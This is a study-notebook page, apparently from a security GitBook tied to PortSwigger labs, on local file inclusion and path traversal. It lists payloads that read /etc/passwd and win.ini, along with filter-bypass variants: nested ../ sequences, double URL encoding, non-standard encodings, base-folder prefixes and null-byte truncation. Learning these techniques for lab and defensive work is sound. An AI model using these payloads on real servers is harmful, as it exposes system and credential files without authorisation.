Passion
  • What is this GitBook about ?
  • Privilege Escalation
    • Linux
    • Windows
  • Network Security
    • Port Scanning
    • DNS Enumeration
    • FTP Enumeration
    • SSH Enumeration
    • SMB Enumeration
    • SMTP Enumeration
    • POP3 Enumeration
  • Checklists
    • Active Directory Security
    • OS Command Injection
    • Buffer Overflow
    • Broken Access Control
    • Local File Inclusion
    • SSRF
    • XXE Attacks
    • SQL Injection
    • XSS
  • WebApp Security
    • Local File Inclusion
    • File Upload Attacks
      • IIS Server File Upload
      • Escaping Sandbox via File Upload
    • Broken Access Control
      • Vertical PrivEsc
      • Horizontal PrivEsc
      • Horizontal => Vertical
    • OS Command Injection
    • SSTI
      • Finding the Injection Point
      • Indentification
      • Exploitation
    • XXE Attacks
      • XXE to LFI
      • XXE to SSRF
      • XXE via File upload
      • XInclude Attacks
      • Blind XXE Attacks
        • Identification
        • Exploitation
        • Blind XXE to LFI
        • Blind XXE by defining Local DTD
    • SQL Injection
    • Server Side Request Forgery
      • Various Attack Methods
      • Exploiting Blind SSRF
    • OAuth Attacks
      • In Password-Based Logins
    • XSS
      • Reflected XSS
      • Stored XSS
      • DOM XSS
      • Blind XSS
      • Perfecting our Payload
      • Exploiting Blind XSS
  • WebApp Mitigations
    • SSTI
  • Docker Security
    • Configuration
    • Ngnix Deployment
  • ☁️Cloud Security
    • AWS
      • Cloud Breach S3
      • IAM PrivEsc - RollBack
      • IAM PrivEsc - Attachment
Powered by GitBook
On this page
  • 1. Absolute Path Name
  • 2. Nested Traversal Sequence
  • 3. Double Encoding the Sequence
  • 4.Using the Base Folder's Path
  • 5. File Path Traversal via NULL Byte
  1. WebApp Security

Local File Inclusion

PRACTICE ! PRACTICE ! PRACTICE !

PreviousXSSNextFile Upload Attacks

Last updated 2 years ago

Suppose for an example, we could render an image from a website which runs an application in the backend.

Ususally images are loaded to render via some html links and the below code explains

<img src="/loadImage?filename=akash.png">

The loadImage takes a filename parameter and returns a content of the specified file.

In Linux, the images are stored in a permanent disk /var/www/images by default

Sample example of a Linux and Windows based LFI exploit !

https://example.com/loadImage?filename=../../../etc/passwd
https://example.com/loadImage?filename=..\..\..\windows\win.ini
Basic PortSwigger Exercises

1. Absolute Path Name

Now when we try to use the dots and slashes sequence, we get a 404 error saying it's not found. This means the application which is running in the background strips or blocks directory traversal sequence from the user-supplied filename that is :)

filename?loadImage=/var/www/images/../../../etc/passwd

It blocks the dot sequence, which makes us even more easy to exploit it by just giving the exact filesystem path such as => /etc/passwd.

2. Nested Traversal Sequence

If the previous two methods don't work, we can try a series of Nested Traversal Sequence of dots and slashes.

....// or ....\/

Which will simply, revert travel sequences when the inner sequence is stripped by the backend.

NOTE => The sequence must be two dots and slashes.

filename?loadImage=....//....//....//etc/passwd
filename?loadImage=....\/....\/....\/etc/passwd

3. Double Encoding the Sequence

If none of the above methods work, then we'll have to end up encoding our sequential payload.

The filename parameter of a multipart/form-data request strips the directory sequence before passing it to the backend, It then performs a URL-decode of the input before using it.

To bypass this kind of sanitization, we can double encode our characters.

%2e%2e%2f => Single encode
%252e%252e%252f => Double encode

Various non-standard encodings, such as ..%c0%af or ..%ef%bc%8f, may also work in some cases.

4.Using the Base Folder's Path

https://example.com/loadImage?filename=/var/www/images/../../../etc/passwd

5. File Path Traversal via NULL Byte

If the backend sanitizes the user supplied input with respect to the specified extension then we'll have to use the NULL Byte %00 to effectively terminate file path before the required extension.

filename=../../../etc/passwd%00.png
Advanced PortSwigger Exercises
Advanced PortSwigger Exercises